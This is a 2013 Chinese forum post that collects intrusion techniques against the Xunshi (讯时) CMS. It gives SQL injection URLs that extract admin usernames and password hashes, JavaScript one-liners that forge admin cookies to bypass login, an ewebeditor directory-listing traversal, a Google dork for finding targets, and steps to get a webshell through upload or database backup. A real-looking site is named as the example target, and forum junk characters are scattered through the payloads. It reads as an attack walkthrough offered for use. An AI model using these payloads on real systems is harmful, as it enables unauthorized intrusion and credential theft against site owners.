找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2513|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘* b' l* L, Y/ c2 E1 [9 w
3 ^# Q" d% s/ C% w: m0 |# Y
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)7 O  e) M4 w; a) W7 r. D

0 J: X% Z' L( M, y- h以下本文总结来自黑防去年第9期杂志上的内容...- v, y) |* \3 h! C' l' e

( g& @% `1 s9 m* O! N- h* p& }先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%# n% _" L, c/ W4 h7 L5 y- n
) `0 \* A* f/ S" L; U
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
% k& \) U6 K& {8 V1 f6 y6 l
* P5 [% y& \5 k( \1 j记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况9 q) A% H. T, Y7 }, W
这里一个注入6 J! q$ v3 @- l8 p# b! d! M
# Z$ U/ z: B. q1 O8 {' j
效果如图:, h; F1 q) h2 @2 x  q& E
5 U- D  {2 ~& a
9 @1 T0 t0 d/ b# r& w- X2 v- Z
/ j" E# A4 q0 T: L. J7 w( W
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
2 U: V  `: u$ J- ^% H
) ~8 v9 W4 n( D. F密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去1 |3 l' t. f  b" a8 k: J

& f$ C4 I, @0 P3 Rjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
2 p; A/ L; K* U% r1 F0 F
$ u" x* e+ J/ e- q- J那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
* y( G$ r8 p5 j" o8 K  ^" \6 G6 G, j; Q) }: F: C- q1 x: V
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
$ J3 S+ c- F$ l; l; T
  H% b! q+ B: z它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以2 i) d  Y( c9 `1 L

. x; _+ @9 W4 Q8 S, l! \% Y访问这页面来列目录..步骤如下:
2 }* ~  A1 c% y- G3 k+ K2 B$ \% x, C) a5 X/ J' n  \4 p
javascript:alert(document.cookie="admindj=1") , g% ^* _- U1 }$ G8 v

9 O6 H5 r1 k& o8 k6 Lhttp://www.political-security.co ... asp?id=46&dir=../..5 f2 A/ B: r" }9 A
5 D& B* {! R" o# q
效果如图:
) U7 O, p0 p2 `- v+ j( S0 H6 A1 f* b% B
. N& m6 Y3 Y+ {

! n+ v& k1 a: J' ]0 y这样全站目录都能瞧了..找到后台目录..进去..# ^" {8 ~% m( C6 C3 Z

, t1 q6 E' d) _/ m: ~那么进了后台怎么拿shell??上传--备份就ok了..
, m9 r0 ?/ z4 r! A/ o( [( o& U) j7 _2 R( L& I7 S/ l
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..# }; ?8 p' L, n, ?4 f

2 n" ~; P$ h. Y' Q& w4 _+ n这个我也碰到过一次..你都可以通过列目录来实现..2 c. ]# C+ u9 c4 v9 m

' l$ ]7 X9 n; W4 l# |2 [javascript:alert(document.cookie="admindj=1") # E) _; O: f1 ]. Z( @- O7 b6 N8 _- H: s
& @8 m3 p- O* _' V
http://www.political-security.co ... p?action=BackupData
# ~: Q, ^2 V% z* `
& J: O  j! i' P3 [备份ok..
# B0 H8 F$ u' L/ }3 m1 Z/ J" x' d+ g/ S. ~. Y+ i
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
6 t  D/ g  N9 ?$ P8 p1 }2 @
  \% h& h/ W( C# F; g在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
7 j2 I7 m$ o  L8 S) r
3 I  `  r: Y+ D7 P* G/ W然后访问此页面进行注入..步骤如下:, ^& \# m- W6 R9 W4 o
8 L7 n, t! j( B/ x9 y% z3 K: ]' {
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")3 l0 t1 F5 {/ G

. j' b5 \! @2 |' {# K然后请求admin/admin_chk.asp页面
; v( y! A) n$ {' r# F/ Z+ m% s$ h% p: g+ E0 z7 C) s; H* Q/ S+ r
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
* C+ o# ^. z+ r+ _4 z1 c# B* u  X, S( p& V* M( j* I
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin5 ^" I9 i: g7 ~, A. g* h! [

5 f1 U2 \0 c2 x$ o+ i4 d效果如图所示:5 _% V" K* D- q+ E3 ^( j

9 J8 n! q4 j8 ]7 {5 U0 j
; K# |8 p1 u, L# `' C; r0 P& Y1 Z/ a7 s9 o
讯时漏洞2& y. S/ [8 Z& o1 x5 `; z
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
8 {  F+ j. A! E" f' Y0 k1 \% E ! S$ Z( K1 g  ]! d) ^
1、/admin/admin_news_pl_view.asp?id=1
( ^( y' _& W" w) x) g//id任意 填入以下语句
" O, Z0 {) c& d+ y$ G2 m$ @$ \8 c1 Q
0 y3 P/ `. A6 c# z0 q1 x( B2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!+ k; l) g' L- z5 j3 y1 n

! v, P: y% S1 g. m! X8 ]# `
8 ~6 i5 y0 E. @5 E
- I; n: k" V, I3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='# g# M- K5 @  B1 F8 n
: h* \) z; v+ m8 I8 |" I0 A
4 K9 V% C$ s: U
1 k* l; T( D) a1 Y3 c# H7 P
爆出管理员帐号和密码了( D: v1 @3 x2 i1 q: l
: m. H" j6 Z0 o. m4 w

8 ^, C+ R2 D  s4 h+ x; f" n0 {0 C) r+ u4 p! J  n9 M% o' Z9 k
4、cookies进后台
4 k. f- w# K3 p# l# i3 ` ( T4 d+ S) V6 R- w. B5 B! {0 k
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));4 m  P8 R  C2 Q" a% q% N3 r. `

7 z: i! p6 s' S
: d5 Y9 X% X& \8 M9 I- a0 ]
) o" W* z0 ~: p, R% \5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
. e+ J: W6 `. S" K, u
; Q) `' C6 A: k& L3 ^' ^1 n2 t
" _4 p. V' l: ]  s6 ?
7 S- D2 c0 `3 Z4 G) f3 W6、后台有上传和备份取SHELL不难。5 Q, o6 e! k; {- [0 L: |5 H
3 \* @5 Y- X: A  o
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
: {3 Z2 P5 G# ~. X) {$ \( {
1 G* ^1 ]( ^& w+ ^  _7 O  p' @9 [: A逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!# x, C" M! o. I4 {3 K& V; M

) t" }6 H; ~% S4 o' n; y
* o# W0 k+ z* T
4 I4 c, ?$ P/ l+ G' P5 N7 j6 U+ \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表